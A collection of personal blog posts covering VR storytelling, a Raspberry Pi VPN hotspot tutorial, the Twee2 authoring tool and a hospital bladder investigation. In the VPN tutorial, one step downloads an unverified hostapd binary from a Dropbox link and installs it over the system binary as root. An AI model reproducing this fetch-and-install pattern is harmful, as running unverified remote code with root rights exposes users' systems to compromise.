Annabel plays with a Google Cardboard with a Samsung Galaxy S6 Edge attached.
There are few user interfaces as simple as moving your own head. Even Annabel – who struggles with the idea that some screens aren’t touchscreens – manages.

It seems to me that the biggest questions that VR content creators will need to start thinking about as we collectively begin to explore this new (or newly-accessible) medium are:

How do we make intuitive user interfaces?

This question mostly relates to creators making “interactive” experiences. Superficially, VR gives user experience designers a running start because there’s little that’s as intuitive as “turning your head to look around” (and, in fact, trying the technology out on a toddler convinced me that it’s adults – who already have an anticipation of what a computer interface ought to be – who are the only ones who’ll find this challenging). On the other hand, most interactive experiences demand more user interaction than simply looking around, and therein lies the challenge. Using a keyboard while you’re wearing a headset is close to impossible (trust me, I’ve tried), although the augmented-reality approach of the Hololens and potentially even the front-facing webcam that’s been added to the HTC Vive PRE might be used to mitigate this. A gamepad is workable, but it’s slightly immersion-breaking in some experiences to hold your hands in a conventional “gamer pose”, as I discovered while playing my Gone Home hackalong: this was the major reason I switched to using a Wiimote.

A pair of Oculus Rift "touch" controllers.
All of the major VR manufacturers are working on single-handed controllers with spatial awareness and accessible buttons. Some also support haptic feedback so that you can “feel” UI components.

So far, I’ve seen a few attempts that don’t seem to work, though. The (otherwise) excellent educational solar system exploration tool Titans of Space makes players stare at on-screen buttons for a few seconds to “press” them, which is clunky and unintuitive: in the real world, we don’t press buttons with our eyes! I understand why they’ve done this: they’re ensuring that their software has the absolute minimum interface requirement that’s shared between the platforms that it supports, but that’s a concern too! If content creators plan to target two or more of the competing systems that will launch this year alone, will they have to make usability compromises?

There’s also the question of how we provide ancillary information to players: the long-established paradigms of “health in the bottom left, ammo in the bottom right” don’t work so obviously when they’re hidden in your peripheral vision. Games like Elite Dangerous have tackled this problem from their inception by making a virtualised “real” user interface comprised of the “screens” in the spaceship around you, but it’s an ongoing challenge for titles that target both VR and conventional platforms in future. Wareable made some great observations about these kinds of concerns, too.

How do we tell stories without forced visual framing?

In my previous blog post, I talked about a documentary that used 360° cameras to “place” the viewer among the protesters that formed the subject of the documentary. In order to provide some context and to reduce the disorientation experienced by “jumping” from location to location, the creator opted to insert “title slides” between scenes with text explaining what would be seen next. But title slides necessitate that the viewer is looking in a particular direction! In the case of this documentary and several other similar projects I’ve seen, the solution was to put the title in four places – at each of the four cardinal directions – so that no matter which way you were looking you’ll probably be able to find one. But title slides are only a small part of the picture.

Two gamers wearing Oculus Rift headsets.
Does anybody else see photos like this and get reminded of the pictures of hooded captives at interrogation camps?

Directors producing content – whether interactive or not – for virtual reality will have to think hard about the implications of the fact that their camera (whether a physical camera or – slightly easier and indeed more-controllable – a simulated camera in a 3D-rendered world) can look in any direction. Sets must be designed to be all-encompassing, which poses huge challenges for the traditional methods of producing film and television programmes. Characters’ exits and entrances must be through believable portals: they can’t simply walk off to the left and stop. And, of course, the content creator must find a way to get the audience’s attention when they need it: watching the first few minutes of Backstage with an Elite Ballerina, for example, puts you in a spacious dance studio with a spritely ballerina to follow… but there’s nothing to stop you looking the other way (perhaps by accident), and – if you do – you might miss some of the action or find it difficult to work out where you’re supposed to be looking. Expand that to a complex, busy scene like, say… the ballroom scene in Labyrinth… and you might find yourself feeling completely lost within a matter of minutes (of course, a feeling of being lost might be the emotional response that the director intends, and hey – VR is great for that!).

Sarah and Jareth dance in the ballroom scene of Labyrinth.
You’re looking the wrong way. Turn around, and you’ll see the best part of the movie.

The potential for VR in some kinds of stories is immense, though. How about a murder mystery story played out in front of you in a dollhouse (showing VR content “in miniature” can help with the motion sickness some people feel if they’re “dragged” from scene to scene): you can move your head to peep in to any room and witness the conversations going on, but the murder itself happens during a power cut or otherwise out-of-sight and the surviving characters are left to deduce the clues. In such a (non-interactive) experience the spectator has the option to follow the action in whatever way they like, and perhaps even differently on different playthroughs, putting the focus on the rooms and characters and clues that interest them most… which might affect whether or not they agree with the detective’s assertions at the end…

What new storytelling mechanisms can this medium provide?

As I mentioned in the previous blog post, we’ve already seen the evolution of storytelling media on several occasions, such as the jump from theatre to cinema and the opportunities that this change eventually provided. Early screenwriters couldn’t have conceived of some of the tools used in modern films, like the use of long flowing takes for establishing shots or the use of fragmented hand-held shots to add an excited energy to fight scenes. It wasn’t for lack of imagination (Georges Méliès realised back in the nineteenth century that timelapse photography could be used to produce special effects not possible in theatre) but rather a lack of the technology and more-importantly a lack of the maturity of the field. There’s an ongoing artistic process whereby storytellers learn new ways to manage their medium from one another: Romeo Must Die may have made clever use of a “zoom-to-X-ray” when a combatant’s bones were broken, but it wouldn’t have been possible if The Matrix hadn’t shown the potential for “bullet time” the previous year. And if we’re going down that road: have you seen the bullet time scene in Zotz!, a film that’s older than the Wachowskis themselves?

Clearly, we’re going to discover new ways of telling stories that aren’t possible with traditional “flat screen” media nor with more-immersive traditional theatre: that’s what makes VR as a storytelling tool so exciting.

Perhaps the original cinematic use of bullet time, in Zotz!
The original use of bullet time still wasn’t entirely new, as the original bullet predates it by hundreds of years.

Of course, we don’t yet know what storytelling tools we’ll find in this medium, but some ideas I’ve been thinking about are:

  • Triggering empathetic responses by encouraging the audience to more-closely relate to the situation of characters by putting them more-directly “in their shoes”. That Dragon, Cancer, an autobiographical game about the experience of a child’s terminal cancer, is an incredibly emotive experience… but only begins to touch upon the emotional journeys possible through virtual reality: what’s it really like to be close to somebody who’s terminally ill?
  • Allowing spectators to spectate a story in their own way, or from a perspective that they choose and control. We’ve already begun to explore this as a concept with the (little-used) multi-angle feature on DVDs: for example, if you’ve got the special edition of Die Hard then you can rewatch certain scenes and flick between different cameras as you watch. But that’s nothing on the potential for future animated films to allow you to walk or fly around and watch from any angle… or in the case of interactive experiences, to influence the direction that the story takes by your actions or even just by your presence: how about a heist story in which the burglars will only carry out their plan if they can’t tell that you’re watching them, forcing you to be surreptitious in your glances over to see what they’re up to?
"Fly" motion simulator
There’s no need to build a rollercoaster at all: a good motion simulator plus a VR headset can probably provide a similar experience.
  • Combining VR with motion simulation: Alton Towers is leading the way here, with their announcement that they’re going to re-engineer the Air rollercoaster into Galactica, on which the ride provides the sensation of motion while a Samsung Gear VR headset simulates an otherwise-impossible spacefaring experience, and I’m hugely excited about the prospect. But a more-adaptable and economical way to achieve a similar result would be to repurpose a motion simulator: the good ones can provide the sensation of g-forces on almost any vector for an extended period of time; the really good ones can provide short bursts of g-forces at levels other than that provided by Earth’s gravity (usually by flinging the carriage around on a programmable shuttle arm, although weightlessness is still unfeasible while you remain on the ground). If you didn’t think that 2013’s Gravity was nauseating enough when it was merely in 3D, wait until you try a similar experience in motion-assisted virtual reality.
  • Point-of-view framing: this paradigm has always been at least a little unsatisfying in regular movies. I mean, it might have been the best moment in Doom, but that’s more to do with how appalling that film was than how good the technique is! But the potential for stepping in to the viewpoint of another human and being able to look around has great potential for immersion-building without allowing the participant to stray too-far from the main storyline. Something that people who haven’t yet experienced VR don’t often appreciate is that a few little things can really improve the experience of immersion… things like being able to move your head, even by just a few degrees, make you feel like you’re “there”. There are some big challenges to overcome with this, of course, such as how to make the movement of the camera not make the watcher feel ‘dragged along’, especially if their experience is of moving sideways… but these are challenges that will probably be solved for us quickly by the porn industry, who’re working very hard on making this kind of experience seamless. Just like the leaps and bounds we took with streaming video, yet again technology will get to thank people’s love of porn for advancing what home computers are capable of.
GIF showing a variety people watching VR porn. [SFW]
Nothing in this GIF reflects how people will genuinely watch VR porn. There’ll be a lot more lube and a lot fewer clothes, I guarantee it.
  • Exploring therapeutic experiences: until I really started trying out different VR gear, I didn’t think that it would be sufficiently engaging to be able to trigger a strong enough response to be useful in a therapeutic capacity. But after the first time I came out of a 10-minute game of Caaaaardboard! feeling genuinely wobbly at the knees in the same way as after my first parachute jump, I realised that modern VR really can produce an experience that results in a psychosomatic response. And that’s really important, because it provides a whole new medium in which we can treat (and, I suppose, study), for example, phobias in a controlled and ‘escapable’ environment. Of course, that raises other questions too, such as: is it possible to cause disorders like PTSD with virtual reality? If it’s simply the case that optimally-made VR is more-immersive than the best possible “flat screen” experiences and that it’s this that can improve its therapeutic potential, then surely it can be more-traumatic, too: I know enough people that were emotionally-scarred by Bambi‘s mother’s death, E.T.‘s almost-death, or that one scene from Watership Down that gave me nightmares for years: how much more (potentially)-damaging could a VR experience be? Whether or not it’s truly the case, it’ll only take one or two media circuses about murderous psychopaths who are unable to differentiate their virtual reality from the real kind before people start getting asked these kinds of questions.
  • Oh, and this webcomic, of course.

As I’m sure I’ve given away over these last three blog posts, I’m really interested in the storytelling potential of VR, and you can bet I’ll be bothering you all again with updates of the things I get to play with later this year (and, in fact, some of the cool technologies I’ve managed to get access to just while I’ve been writing up these blog posts).

If you haven’t had a chance to play with contemporary VR, get yourself a Cardboard. It’s dirt-cheap and it’s (relatively) low-tech and it’s nowhere near as awesome as “real” hardware solutions… but it’s still a great introduction to what I’m talking about and it’s absolutely worth doing. And if you have, I’d love to hear your thoughts on storytelling using virtual reality, too.


Immersive Storytelling – Thoughts on Virtual Reality, part 2

This is the second in a three-part blog post about telling stories using virtual reality. Read all of the parts here.

I’m still waiting to get in on the Oculus Rift and HTC Vive magic when they’re made generally-available later this year. But in the meantime, I’m enjoying quite how hackable VR technologies are. I chucked my Samsung Galaxy S6 edge into an I Am Cardboard DSCVR, paired it with a gaming PC using TrinusVR, used GlovePIE to hook up a Wii remote (playing games with a keyboard or even a gamepad is challenging if your headset doesn’t have a headstrap, so a one-handed control is needed), and played a game of Gone Home. It’s a cheap and simple way to jump into VR gaming, especially if – like me – you already own the electronic components: the phone, PC, and Wiimote.

An I Am Cardboard, a Samsung Galaxy S6, and a Nintendo Wii Remote
My VR system is more-ghetto than yours.

While the media seems to mostly fixate on the value of VR in “action” gaming – shoot-’em-ups, flight simulators, etc. – I actually think there’s possibly greater value for it in more story-driven genres. I chose Gone Home for my experiment, above, because it’s an adventure that you play at your own pace, where the amount you get out of it as a story depends on your level of attention to detail, not how quickly you can pull a trigger. Especially on this kind of highly-affordable VR gear, “twitchy” experiences that require rapid head turning are particularly unsatisfying, not-least because the response time of even the fastest screens is always going to be significantly slower than that of real life. But as a storytelling medium (especially in an affordable form) it’s got incredible potential.

Screengrab from Hong Kong Unrest - a 360° Virtual Reality Documentary.
Nothing quite gives you a feel of the human scale of the Hong Kong protests like being able to look around you, as if you’re stood in the middle of them.

I was really pleased to discover that some content creators are already experimenting with the storytelling potential of immersive VR experiences. An example would be the video Hong Kong Unrest – a 360° Virtual Reality Documentary, freely-available on YouTube. Standing his camera (presumably a Jump camera rig, or something similar) amongst the crowds of the 2014 Hong Kong protests, the creator of this documentary gives us a great opportunity to feel as though we’re standing right there with the protesters. The sense of immersion of being “with” the protesters is, in itself, a storytelling statement that shows the filmmaker’s bias: you’re encouraged to empathise with the disenfranchised Hong Kong voters, to feel like you’re not only with them in a virtual sense, but emotionally with them in support of their situation. I’m afraid that watching the click-and-drag version of the video doesn’t do it justice: strap a Cardboard to your head to get the full experience.

An augmented reality shoot-'em-up game via Microsoft Hololens
Don’t go thinking that I’m not paying attention to the development of the Hololens, too: I am, because it looks amazing. I just don’t know… what it’s for. And, I suspect, neither does Microsoft.

But aside from the opportunities it presents, Virtual Reality brings huge new challenges for content creators, too. Consider that iconic spaghetti western The Good, The Bad, And The Ugly. The opening scene drops us right into one of the artistic themes of the film – the balance of wide and close-up shots – when it initially shows us a wide open expanse but then quickly fills the frame with the face of Tuco (“The Ugly”), giving us the experience of feeling suddenly cornered and trapped by this dangerous man. That’s a hugely valuable shot (and a director’s wet dream), but it represents something that we simply don’t have a way of translating into an immersive VR setting! Aside from the obvious fact that the viewer could simply turn their head and ruin the surprise of the shot, it’s just not possible to fill the frame with the actor’s face in this kind of way without forcing the focal depth to shift uncomfortably.

Opening scene of The Good, The Bad, And The Ugly.
Sergio Leone’s masterpiece makes strategic use of alternating close and wide shots (and shots like the opening, which initially feels open but rapidly becomes claustrophobic).

That’s not to say that there exist stories that we can’t tell using virtual reality… just that we’re only just beginning to find our feet with this new medium. When stage directors took their first steps into filmography in the early years of the 20th century, they originally tried to shoot films “as if” they were theatre (albeit, initially, silent theatre): static cameras shooting an entire production from a single angle. Later, they discovered ways in which this new medium could provide new ways to tell stories: using title cards to set the scene, close-ups to show actors’ faces more-clearly, panning shots, and so on.

Similarly: so long as we treat the current generation of VR as something different from the faltering steps we took two and a half decades ago, we’re in frontier territory and feeling our way in VR, too. Do you remember when smartphone gaming first became a thing and nobody knew how to make proper user interfaces for it? Often your tiny mobile screen would simply try to emulate classic controllers, with a “d-pad” and “buttons” in the corners of the screen, and it was awful… but nowadays, we better-understand the relationship that people have with their phones and have adapted accordingly (perhaps the ultimate example of this, in my opinion, is the addictive One More Line, a minimalist game with a single-action “press anywhere” interface).

Dan plays Back To Dinosaur Island on an Oculus Rift.
A few seconds after this photograph was taken, a T-rex came bounding out from the treeline and I literally jumped.

I borrowed an Oculus Rift DK2 from a co-worker’s partner (have I mentioned lately that I have the most awesome co-workers?) to get a little experience with it, and it’s honestly one of the coolest bits of technology I’ve ever had the privilege of playing with: the graphics, comfort, and responsiveness blow Cardboard out of the water. One of my first adventures – Crytek’s tech demo Back to Dinosaur Island – was a visual spectacle even despite my apparently-underpowered computer (I’d hooked the kit up to Gina, my two-month-old 4K-capable media centre/gaming PC: I suspect that Cosmo, my multi-GPU watercooled beast, might have fared better). But I’ll have more to say about that – and the lessons I’ve learned – in the final part of this blog post.


Immersive Storytelling – Thoughts on Virtual Reality, part 1

This is the first in a three-part blog post about telling stories using virtual reality. Read all of the parts here.

As part of my work at the Bodleian… but to a greater extent “just for fun”… I’ve spent the last few weeks playing with virtual reality. But first, a history lesson.

Dan stomps around his office wearing a Google Cardboard.
Virtual Reality’s biggest failing is that its sheer coolness is equally offset by what an idiot you look like when you’re using it.

This isn’t the first time I’ve used virtual reality. The first time, for me, was in the early 1990s, at the Future Entertainment Show, where I queued for a shot at Grid Busters on a Virtuality 1000-CS. The Virtuality 1000 was powered by an “Expality”: functionally an Amiga 3000 with specially-written software for reading the (electromagnetically-sensed) facing of the headset and the accompanying “space joystick”… and providing output via a pair of graphics cards (one for each eye) to LCD screens. The screens were embedded in chunky bits on the sides of the helmet and projected towards mirrors and lenses at the far end – this apparently being an effort to reduce how “front-heavy” it felt, but I can tell you that in practice a Virtuality headset felt weighty on your neck, even for its era!

Nonetheless, the experience stuck with me: I returned to school and became the envy of my friends (the nerdy ones, at least) when I told them about my VR adventure, and – not least thanks to programs like Tomorrow’s World and, of course, the episode of Bad Influence that reminded me quite how badly I wanted to get myself down to Nottingham for a go at Legend Quest – I was genuinely filled with optimism that within the decade, playing a VR game would have gone from the fringes of science fiction to being something where everybody-knew-somebody who did it routinely.

A Virtuality 1000 CS system.
A modern computer and VR headset combined probably weighs less than this reconditioned Virtuality 1000 headset.

I never managed to get to play Legend Quest, and that first “VR revolution” swiftly fell flat. My generation was promised all of the hi-tech science, immersion, and magical experience of The Lawnmower Man, but all we were left with was the overblown promises, expensive effects, and ill-considered user experience of, well… The Lawnmower Man. I discovered Virtuality machines in arcades once or twice, but they seemed to be out-of-order more often than not, and they quickly disappeared. You can’t really blame the owners of arcades: if a machine costs you in the region of £40,000 to buy and you can charge, say, £1 for a 3-minute go on it (bear in mind that even the most-expensive digital arcade machines tended to charge only around 30p, at this time, and most were 10p or 20p), and it needs supervision, and it can’t be maintained by your regular guy… well, that swiftly begins to feel like a bad investment.

Jobe's first experience of virtual reality, in 1992's The Lawnmower Man.
The Lawnmower Man has a lot to answer for.

Plus, the fifth generation of games consoles came along: the (original) Sony PlayStation, the Nintendo N64, and – if you really wanted the highest-technology system (with the absolute least imaginative developers) – the Sega Saturn. These consoles came at price points that made them suitable Christmas gifts for the good boys and girls of middle-class parents and sported 3D polygon graphics of the type that had previously only been seen in arcades, and the slow decline of the video arcade accelerated dramatically. But home buyers couldn’t afford five-figure (still moderately-experimental) VR systems, and the market for VR dried up in a matter of years. Nowadays, if you want to play on a Virtuality machine like the one I did, you need to find a collector (you might start with this guy from Leicester, whose website was so useful in jogging my memory while I wrote this blog post).

The Dean's VR machine, in Season 6 of Community, was clearly inspired by Virtuality.
And Jesus wept, for there were no more VR machines anywhere for, like, two decades.

2016 is the year in which this might change. The need for ubiquitous cheap computing has made RAM and even processors so economical that we throw them away when we’re done with them. The demands of modern gaming computers and consoles have given us fast but affordable graphics rendering hardware. And the battle for the hottest new smartphones each year has helped to produce light, bright, high-resolution screens no bigger than the palm of your hand.

In fact, smartphones are now the simplest and cheapest way to play with VR. Under the assumption that you’ve already got a smartphone, you’re only a couple of cheap plastic lenses and a bit of cardboard away from doing it for yourself. So that’s how my team and I started out playing: with the wonderfully-named Google Cardboard. I know that Google Cardboard is old-hat and all the early adopters have even got their grandmothers using it by now, but it’s still a beautiful example of how economical VR threatens to become if this second “VR revolution” takes hold. Even if you didn’t already own a compatible smartphone, you could buy a second-hand one on eBay for as little as £30: that’s an enormous difference from the £40K Virtuality machines of my youth, which had only a fraction of the power.

Liz plays with a Google Cardboard.
An original-style Google Cardboard makes you look as much of a fool as any VR headset does. But more-specifically like a fool with a box on their head.

I’m going somewhere with this, I promise: but I wanted to have a jumping-off point from which to talk about virtual reality more-broadly first and it felt like I’d be overstretching if I jumped right in at the middle. Y’know, like the second act of The Lawnmower Man. In the next part of this series, I’d like to talk about the storytelling opportunities that modern VR offers us, and some of the challenges that come with it, and share my experience of playing with some “proper” modern hardware – an Oculus Rift.


Highlights of 2016 so far

Despite a full workload and a backlog of work, personal, volunteering and study emails to deal with, 2016 is off to a pretty good start so far. Here are some highlights:

  • In Sainsbury’s at the weekend, I got carded. Less than a week before my thirty-fifth birthday and for the first time in well over a decade, somebody asked me to prove my age when I was trying to buy alcohol*. It’s even more-impressive when you consider that I was buying about £90 worth of shopping and a single small bottle of kirsch… oh, and I had a toddler with me. That would have been an incredible amount of effort for somebody who very-definitely looks like he’s in his thirties. Delighted.
  • This week, I’ve been mostly working on a project to make interactive digital content to support an exhibition on board games that we’re about to launch at my workplace. When my head of department first mentioned the upcoming exhibition, there was no way you could have held me back.
  • Annabel has recently decided that she deserves a beard like her father and her Uncle Dan. Her new game is encouraging people to draw them on her with washable pens. Aww.
Annabel sporting a full beard.
This is the third design of beard she’s had this week – this one’s “like daddy”.

I hope everybody else’s year is kicking off just as well.

* With one possible exception: the other year, an overenthusiastic bouncer insisted that I join a queue of one in turn to show him my ID before he let me into a nightclub at 9:30pm on a Wednesday night. Like I said, overenthusiastic.


Raspberry Pi VPN Hotspot (or How To Infuriate Theresa May For Under £40)

As you’re no-doubt aware, Home Secretary Theresa May is probably going to get her way with her “snooper’s charter” by capitalising on events in Paris (even though that makes no sense), and before long, people working for law enforcement will be able to read your Internet usage history without so much as a warrant (or, as the UN’s privacy chief put it, it’s “worse than scary”).

John Oliver on Last Week Tonight discusses the bill.
Or as John Oliver put it, “This bill could write into law a huge invasion of privacy.” Click to see a clip.

In a revelation that we should be as thankful for as we are terrified by, our government does not understand how the Internet works. And that’s why it’s really easy for somebody with only a modicum of geekery to almost-completely hide their online activities from observation by their government and simultaneously from hackers. Here’s a device that I built the other weekend, and below I’ll tell you how to do it yourself (and how it keeps you safe online from a variety of threats, as well as potentially giving you certain other advantages online):

"Iceland", one of my Raspberry Pi VPN hotspots
It’s small, it’s cute, and it goes a long way to protecting my privacy online.

I call it “Iceland”, for reasons that will become clear later. But a more-descriptive name would be a “Raspberry Pi VPN Hotspot”. Here’s what you’ll need if you want to build one:

  • A Raspberry Pi Model B (or later) – you can get these for less than £30 online and it’ll come with an SD card that’ll let it boot Raspbian, which is the Linux distribution I’ve used in my example: there’s no reason you couldn’t use another one if you’re familiar with it
  • A USB WiFi dongle that supports “access point” mode – I’m using an Edimax one that cost me under a fiver, but it took a little hacking to make it work; I’ve heard that Panda and RALink dongles are easier
  • A subscription to a VPN with OpenVPN support and at least one endpoint outside of the UK – I’m using VyprVPN because I have a special offer, but there are lots of cheaper options: here’s a great article about choosing one
  • A basic familiarity with a *nix command line, an elementary understanding of IP networking, and a spare 20 minutes.

From here on, this post gets pretty geeky. Unless you plan on building your own little box to encrypt all of your home’s WiFi traffic until it’s well out of the UK and close-to-impossible to link to you personally (which you should!), you probably ought to come back to it another time.

Here’s how it’s done:

1. Plug in, boot, and install some prerequisites

Plug the WiFi dongle into a USB port and connect the Ethernet port to your Internet router. Boot your Raspberry Pi into Raspbian (as described in the helpsheet that comes with it), and run:

sudo apt-get install bridge-utils hostapd udhcpd bind9 openvpn

2. Make HostAPD support your Edimax dongle

If, like me, you’re using an Edimax dongle, you need to do an extra couple of steps to make it work as an access point. Skip this bit if you’re using one of the other dongles I listed or if you know better.

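# Fetch a patched hostapd binary that supports the Edimax chipset, keep the
# packaged original as a backup, and symlink the replacement into place: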
wget http://dl.dropbox.com/u/1663660/hostapd/hostapd.zip
unzip hostapd.zip
sudo mv /usr/sbin/hostapd /usr/sbin/hostapd.original
sudo mv hostapd /usr/sbin/hostapd.edimax
sudo ln -sf /usr/sbin/hostapd.edimax /usr/sbin/hostapd
sudo chown root:root /usr/sbin/hostapd
sudo chmod 755 /usr/sbin/hostapd

3. Set up OpenVPN

Get OpenVPN configuration files from your VPN provider: often these will be available under the iOS downloads. There’ll probably be one for each available endpoint. I chose the one for Reykjavik, because Iceland’s got moderately sensible privacy laws and I’m pretty confident that it would take judicial oversight for British law enforcement to collaborate with Icelandic authorities on getting a wiretap in place, which is the kind of level of privacy I’m happy with. Copy your file to /etc/openvpn/openvpn.conf and edit it: you may find that you need to put your VPN username and password into it to make it work.
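As a sketch of what that might look like – your provider’s files will differ, and the filenames here are only examples – you can point OpenVPN’s auth-user-pass directive at a credentials file so that the tunnel comes up without prompting you:

auth-user-pass /etc/openvpn/credentials

Then put your VPN username on the first line of /etc/openvpn/credentials and your password on the second, and lock the file down so only root can read it:

sudo chmod 600 /etc/openvpn/credentials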

sudo service openvpn start

You can now test your VPN’s working, if you like. I suggest connecting to the awesome icanhazip.com and asking it where you are (you can use your favourite GeoIP website to tell you what country it thinks you’re in, based on that):

curl -4 icanhazip.com

Another option would be to check with a GeoIP service directly:

curl freegeoip.net/json/

4. Set up your firewall and restart the VPN connection

Unless your VPN provider gives you DNAT (and even if they do, if you’re paranoid), you should set up a firewall to allow only outgoing connections to be established, and then restart your VPN connection:

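# Accept inbound packets on the VPN tunnel only when they belong to a
# connection that we opened ourselves; drop everything else, then save the
# ruleset and arrange for it to be restored whenever the interface comes up: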
sudo iptables -A INPUT -i tun0 -m conntrack --ctstate RELATED,ESTABLISHED -j ACCEPT
sudo iptables -A INPUT -i tun0 -j DROP
sudo sh -c "iptables-save > /etc/iptables.nat.vpn.secure"
sudo sh -c "echo 'up iptables-restore < /etc/iptables.nat.vpn.secure' >> /etc/network/interfaces"
sudo service openvpn restart

5. Configure your WiFi hotspot

Configure bind as your DNS server, caching responses on behalf of Google’s DNS servers, or another DNS server that you trust. Alternatively, you can just configure your DHCP clients to use Google’s DNS servers directly, but caching will probably improve your performance overall. To do this, add a forwarder to /etc/bind/named.conf.options:

forwarders {
  8.8.8.8;
  8.8.4.4;
};

Restart bind, and make sure it loads on boot:

sudo service bind9 restart
sudo update-rc.d bind9 enable

Edit /etc/udhcpd.conf. As a minimum, you should have a configuration along these lines (you might need to tweak your IP address assignments to fit with your local network – the “router” and “dns” settings should be set to the IP address you’ll give to your Raspberry Pi):

start 192.168.0.2
end 192.168.0.254
interface wlan0
remaining yes
opt dns 192.168.0.1
option subnet 255.255.255.0
opt router 192.168.0.1
option lease 864000 # 10 days

Enable DHCP by uncommenting (remove the hash!) the following line in /etc/default/udhcpd:

#DHCPD_ENABLED="yes"

Set a static IP address on your Raspberry Pi in the same subnet as you configured above (but not between the start and end of the DHCP list):

sudo ifconfig wlan0 192.168.0.1

And edit your /etc/network/interfaces file to configure it to retain this on reboot:

iface wlan0 inet static
  address 192.168.0.1
  netmask 255.255.255.0

And comment out the lines relating to hot-plugging of WiFi adapters/network hopping:

#allow-hotplug wlan0
#wpa-roam /etc/wpa_supplicant/wpa_supplicant.conf
#iface default inet manual

Right – onto hostapd, the fiddliest of the tools you’ll have to configure. Create or edit /etc/hostapd/hostapd.conf as follows, but substitute in your own SSID, hotspot password, and channel (to minimise interference, which can slow your network down, I recommend using a WiFi scanner tool on your mobile to find which channels your neighbours aren’t using, and use one of those – you should probably avoid the channel your normal WiFi uses, too, so you don’t slow your own connection down with crosstalk):

interface=wlan0
driver=nl80211
ssid=your network name
hw_mode=g
channel=6
macaddr_acl=0
auth_algs=1
ignore_broadcast_ssid=0
wpa=2
wpa_passphrase=your network password
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
rsn_pairwise=CCMP

Hook up this configuration by editing /etc/default/hostapd:

DAEMON_CONF="/etc/hostapd/hostapd.conf"

Fire up the hotspot, and make sure it runs on reboot:

sudo service hostapd start
sudo service udhcpd start
sudo update-rc.d hostapd enable
sudo update-rc.d udhcpd enable

Finally, set up NAT so that people connecting to your new hotspot are forwarded through the IP tunnel of your VPN connection:

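# Enable IP forwarding both now and on every future boot, then masquerade
# hotspot clients' traffic so that it all leaves via the VPN tunnel (tun0):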
sudo sh -c "echo 1 > /proc/sys/net/ipv4/ip_forward"
sudo sh -c "echo net.ipv4.ip_forward=1 >> /etc/sysctl.conf"
sudo iptables -t nat -A POSTROUTING -o tun0 -j MASQUERADE
sudo sh -c "iptables-save > /etc/iptables.nat.vpn.secure"

6. Give it a go!

Connect to your new WiFi hotspot, and go to your favourite GeoIP service. Or, if your VPN endpoint gives you access to geographically-limited services, give those a go (you’d be amazed how different the Netflix catalogues are in different parts of the world). And give me a shout if you need any help or if you have any clever ideas about how this magic little box can be improved.



Twee2 – Interactive Fiction Authoring for Geeks

There’s a wonderful tool for making web-based “choose your own adventure”-type games, called Twine. One of the best things about it is that it’s so accessible: if you wanted to, you could be underway writing your first-ever story with it about 5 minutes from now, without installing anything at all, and when it was done you could publish it on the web and it would just work.

Screenshot of a Twine 2 story map
A “story map” in Twine 2. Easy interactive fiction writing for normal people.

But the problem with Twine is that, in its latest and best versions, you’re trapped into using the Twine IDE. The Twine IDE is an easy-to-use, highly visual, ‘drag-and-drop’ interface for making interactive stories. Which is probably great if you’re into IDEs or if you don’t “know better”… but for those of us who prefer to do our writing in a nice clean, empty text editor like Sublime or TextMate, or to script/automate our builds, it’s just frustrating to lose access to the tools we love. Plus, highly-visual IDEs make it notoriously hard to collaborate with other authors on the same work without simply passing it back and forth between you: unless they’ve been built with this goal in mind, you generally can’t have two people working in the same file at the same time.

Sublime Text demonstrating multi-line-selection.
Now THIS is what code editing should look like.

Earlier versions of Twine had a command-line tool called Twee that perfectly filled this gap. But the shiny new versions don’t. That’s where I came in.

In that way that people who know me are probably used to by now, I was very-slightly unsatisfied with one aspect of an otherwise fantastic product and decided that the correct course of action was to reimplement it myself. So that’s how, a few weeks ago, I came to release Twee2.

Twee2 logo
Twee2’s logo integrates the ‘branching’ design of Twine adventures with the ‘double-colon’ syntax of Twee.

If you’re interested in writing your own “Choose Your Own Adventure”-type interactive fiction, whether for the world or just for friends, but you find user-friendly IDEs like Twine limiting (or you just prefer a good old-fashioned text editor), then give Twee2 a go. I’ve written a simple 2-minute tutorial to get you started, it works on Windows, MacOS, Linux, and just-about everything else, and it’s completely open-source if you’d like to expand or change it yourself.
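To give you a flavour of what that looks like – this is a minimal sketch of my own invention rather than anything from the tutorial, and the filenames are made up – a Twee2 story is just a plain text file of passages, each introduced by a double-colon header, with links written in double square brackets:

::Start
You stand at a fork in the road.

[[Take the left path|Left]]
[[Take the right path|Right]]

::Left
A dragon! You flee back the way you came. [[Phew.|Start]]

::Right
You find a chest of gold. THE END.

Compile it into a playable web page from your terminal with something like twee2 build adventure.tw2 adventure.html, then open the result in your browser.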

(there are further discussions about the concept and my tool on Reddit here, here, here and here, and on the Twinery forums here, here and here)

Get Twee2


Into the Lair of the Bladder Monster

Warning: this blog post contains pictures of urine, invasive equipment, and the inside of a bladder. It’s probably safe for all audiences, but you might like to put your glass of apple juice down for a minute or two. The short of it all is that I’m probably healthy.

Since my hospitalisation the other month with a renal system infection, I’ve undergone a series of investigations to try to determine if there’s an underlying reason that I fell ill. As my doctor explained to me, it’s quite possible that what I’d experienced was a random opportunistic infection (perhaps aided by a course of unrelated antibiotics I’d been on earlier this year or by certain lifestyle habits), but if that wasn’t the case – if there were some deeper explanation for my health problems – it was important to find out sooner, rather than later.

A sterile pot full of Dan Q's urine.
I’ve peed in so many little pots! If you laid them end-to-end across your kitchen counter, people would think that you were some kind of pervert.

Early on I had several ultrasound scans of my bladder (at a number of different times and at a variety of levels of fullness) and of my kidneys, the latter of which revealed some “minor scarring” on one of them which apparently isn’t something I should be worried about… although I wish the two-page letter I received had started with that, rather than opening with, effectively, “Contrary to what we told you at the hospital, we did later see something wrong with you…” But still, good to be reassured that this is probably not an issue.

Ultrasound scan of one of Dan Q's kidneys.
An ultrasound scan of one of my kidneys. Can you tell the sex yet?

More recently, I went to the hospital to have a “flow rate test” and a cystoscopy. The flow rate test involved the most ghetto-looking piece of NHS equipment I’ve ever seen: functionally, it seemed to be little more than a funnel on top of a large measuring beaker, in turn on top of a pressure-sensitive digital scale. The scale was connected up to the only fancy-looking bit of equipment in the room, a graphing printer that output the calculated volume of urine (based on its weight) and, more-importantly, the rate of change: the “flow rate” of the stream.

A stream of urine pours down into a funnel.
I’m right, aren’t I? That’s basically a kitchen funnel, isn’t it?

I suppose one advantage of using equipment like this is that it basically operates itself. Which meant that the nurse was able to give me five seconds worth of instruction and then leave the room, which saved us from our own Britishness forcing us to make small-talk while I urinated in front of her or something. Ultimately, I turned out to be within the range of normalcy here, too, although I was a little disappointed to find that the ward didn’t maintain a daily “score board” of flow rates, as sort-of a science-backed literal pissing contest.

